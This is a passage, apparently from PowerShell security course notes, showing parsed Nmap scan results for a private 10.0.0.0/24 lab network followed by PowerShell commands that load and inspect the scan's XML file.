\n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.140\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.141\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.142\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.143\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.144\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.145\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.146\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.147\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.148\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.149\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.150\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.151\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.152\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.153\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.154\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.155\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.156\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.157\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.158\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.159\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.160\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.161\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.162\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.163\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.164\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.165\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.166\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.167\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.168\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.169\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.170\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.171\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.172\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.173\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.174\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.175\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.176\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.177\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.178\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.179\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.180\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.181\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.182\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.183\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.184\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.185\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.186\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.187\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.188\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.189\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.190\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.191\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.192\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.193\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.194\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.195\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.196\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.197\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.198\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.199\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.200\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.201\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.202\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.203\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.204\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.205\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.206\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.207\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.208\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.209\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.210\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.211\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.212\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.213\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.214\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.215\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.216\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.217\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.218\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.219\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.220\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.221\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.222\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.223\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.224\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.225\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.226\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.227\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.228\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.229\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.230\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.231\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.232\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.234\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.235\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.236\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.237\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.238\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.239\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.240\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.241\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.242\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.243\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.244\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.245\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.246\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.247\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.248\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.249\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.250\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.251\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.252\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.253\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.255\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : up\n\tIPv4 : 10.0.0.1\n\tIPv6 : \n\tMAC : 00:50:F1:80:00:00\n\tPorts : closed:tcp:21:ftp\n\t filtered:tcp:22:ssh\n\t filtered:tcp:23:telnet\n\t closed:tcp:25:smtp\n\t open:tcp:53:domain\n\t open:tcp:80:http\n\t closed:tcp:110:pop3\n\t closed:tcp:111:rpcbind\n\t closed:tcp:135:msrpc\n\t closed:tcp:139:netbios-ssn\n\t closed:tcp:143:imap\n\t open:tcp:443:https\n\t closed:tcp:445:microsoft-ds\n\t closed:tcp:993:imaps\n\t closed:tcp:995:pop3s\n\t closed:tcp:1723:pptp\n\t closed:tcp:3306:mysql\n\t closed:tcp:3389:ms-wbt-server\n\t closed:tcp:5900:vnc\n\t closed:tcp:8080:http-proxy\n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : up\n\tIPv4 : 10.0.0.19\n\tIPv6 : \n\tMAC : BC:9F:EF:69:35:19\n\tPorts : closed:tcp:21:ftp\n\t closed:tcp:22:ssh\n\t closed:tcp:23:telnet\n\t closed:tcp:25:smtp\n\t closed:tcp:53:domain\n\t closed:tcp:80:http\n\t closed:tcp:110:pop3\n\t closed:tcp:111:rpcbind\n\t closed:tcp:135:msrpc\n\t closed:tcp:139:netbios-ssn\n\t closed:tcp:143:imap\n\t closed:tcp:443:https\n\t closed:tcp:445:microsoft-ds\n\t closed:tcp:993:imaps\n\t closed:tcp:995:pop3s\n\t closed:tcp:1723:pptp\n\t closed:tcp:3306:mysql\n\t closed:tcp:3389:ms-wbt-server\n\t closed:tcp:5900:vnc\n\t closed:tcp:8080:http-proxy\n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : up\n\tIPv4 : 10.0.0.32\n\tIPv6 : \n\tMAC : 90:FD:61:C0:9B:B2\n\tPorts : closed:tcp:21:ftp\n\t closed:tcp:22:ssh\n\t closed:tcp:23:telnet\n\t closed:tcp:25:smtp\n\t closed:tcp:53:domain\n\t closed:tcp:80:http\n\t closed:tcp:110:pop3\n\t closed:tcp:111:rpcbind\n\t closed:tcp:135:msrpc\n\t closed:tcp:139:netbios-ssn\n\t closed:tcp:143:imap\n\t closed:tcp:443:https\n\t closed:tcp:445:microsoft-ds\n\t closed:tcp:993:imaps\n\t closed:tcp:995:pop3s\n\t closed:tcp:1723:pptp\n\t closed:tcp:3306:mysql\n\t closed:tcp:3389:ms-wbt-server\n\t closed:tcp:5900:vnc\n\t closed:tcp:8080:http-proxy\n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : up\n\tIPv4 : 10.0.0.53\n\tIPv6 : \n\tMAC : 40:F0:2F:57:6C:13\n\tPorts : filtered:tcp:21:ftp\n\t filtered:tcp:22:ssh\n\t filtered:tcp:23:telnet\n\t filtered:tcp:25:smtp\n\t filtered:tcp:53:domain\n\t filtered:tcp:80:http\n\t filtered:tcp:110:pop3\n\t filtered:tcp:111:rpcbind\n\t filtered:tcp:135:msrpc\n\t filtered:tcp:139:netbios-ssn\n\t filtered:tcp:143:imap\n\t filtered:tcp:443:https\n\t filtered:tcp:445:microsoft-ds\n\t filtered:tcp:993:imaps\n\t filtered:tcp:995:pop3s\n\t filtered:tcp:1723:pptp\n\t filtered:tcp:3306:mysql\n\t filtered:tcp:3389:ms-wbt-server\n\t filtered:tcp:5900:vnc\n\t filtered:tcp:8080:http-proxy\n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : up\n\tIPv4 : 10.0.0.61\n\tIPv6 : \n\tMAC : 00:9A:CD:C9:77:54\n\tPorts : closed:tcp:21:ftp\n\t closed:tcp:22:ssh\n\t closed:tcp:23:telnet\n\t closed:tcp:25:smtp\n\t closed:tcp:53:domain\n\t closed:tcp:80:http\n\t closed:tcp:110:pop3\n\t closed:tcp:111:rpcbind\n\t closed:tcp:135:msrpc\n\t closed:tcp:139:netbios-ssn\n\t closed:tcp:143:imap\n\t closed:tcp:443:https\n\t closed:tcp:445:microsoft-ds\n\t closed:tcp:993:imaps\n\t closed:tcp:995:pop3s\n\t closed:tcp:1723:pptp\n\t closed:tcp:3306:mysql\n\t closed:tcp:3389:ms-wbt-server\n\t closed:tcp:5900:vnc\n\t closed:tcp:8080:http-proxy\n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : up\n\tIPv4 : 10.0.0.95\n\tIPv6 : \n\tMAC : F4:0F:24:33:5E:D1\n\tPorts : closed:tcp:21:ftp\n\t closed:tcp:22:ssh\n\t closed:tcp:23:telnet\n\t closed:tcp:25:smtp\n\t closed:tcp:53:domain\n\t closed:tcp:80:http\n\t closed:tcp:110:pop3\n\t closed:tcp:111:rpcbind\n\t closed:tcp:135:msrpc\n\t closed:tcp:139:netbios-ssn\n\t closed:tcp:143:imap\n\t closed:tcp:443:https\n\t closed:tcp:445:microsoft-ds\n\t closed:tcp:993:imaps\n\t closed:tcp:995:pop3s\n\t closed:tcp:1723:pptp\n\t closed:tcp:3306:mysql\n\t closed:tcp:3389:ms-wbt-server\n\t closed:tcp:5900:vnc\n\t closed:tcp:8080:http-proxy\n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : up\n\tIPv4 : 10.0.0.254\n\tIPv6 : \n\tMAC : 00:05:04:03:02:01\n\tPorts : closed:tcp:21:ftp\n\t closed:tcp:22:ssh\n\t closed:tcp:23:telnet\n\t closed:tcp:25:smtp\n\t closed:tcp:53:domain\n\t closed:tcp:80:http\n\t closed:tcp:110:pop3\n\t open:tcp:111:rpcbind\n\t closed:tcp:135:msrpc\n\t closed:tcp:139:netbios-ssn\n\t closed:tcp:143:imap\n\t closed:tcp:443:https\n\t closed:tcp:445:microsoft-ds\n\t closed:tcp:993:imaps\n\t closed:tcp:995:pop3s\n\t closed:tcp:1723:pptp\n\t closed:tcp:3306:mysql\n\t closed:tcp:3389:ms-wbt-server\n\t closed:tcp:5900:vnc\n\t closed:tcp:8080:http-proxy\n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : up\n\tIPv4 : 10.0.0.233\n\tIPv6 : \n\tMAC : \n\tPorts : closed:tcp:21:ftp\n\t closed:tcp:22:ssh\n\t closed:tcp:23:telnet\n\t closed:tcp:25:smtp\n\t open:tcp:53:domain\n\t closed:tcp:80:http\n\t closed:tcp:110:pop3\n\t closed:tcp:111:rpcbind\n\t open:tcp:135:msrpc\n\t open:tcp:139:netbios-ssn\n\t closed:tcp:143:imap\n\t closed:tcp:443:https\n\t open:tcp:445:microsoft-ds\n\t closed:tcp:993:imaps\n\t closed:tcp:995:pop3s\n\t closed:tcp:1723:pptp\n\t closed:tcp:3306:mysql\n\t open:tcp:3389:ms-wbt-server\n\t closed:tcp:5900:vnc\n\t closed:tcp:8080:http-proxy\n\tServices : \n\tOS : \n\tScript : \n\t\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day1-PowerShell>\n\t```\n\t\n\t- Manual ```XML``` Parsing\n\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop> $nmap = [xml](Get-Content .\\10.0.0.1.xml)\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop> $nmap\n\t\n\txml nmaprun xml-stylesheet #comment\n\t--- ------- -------------- --------\n\tversion=\"1.0\" encoding=\"UTF-8\" {, nmaprun} href=\"file:///C:/Program Files (x86)/Nmap/nmap.... Nmap 7.50 scan initiated Mon Jul 10 09:33:13 ...\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop> $nmap.nmaprun | Get-Member\n\t\n\t\n\t TypeName: System.String\n\t\n\tName MemberType Definition\n\t---- ---------- ----------\n\tClone Method System.Object Clone(), System.Object ICloneable.Clone()\n\tCompareTo Method int CompareTo(System.Object value), int CompareTo(string strB), int IComparable.CompareTo(System.Object obj), int IComparable[string].CompareTo(string other)\n\tContains Method bool Contains(string value)\n\tCopyTo Method void CopyTo(int sourceIndex, char[] 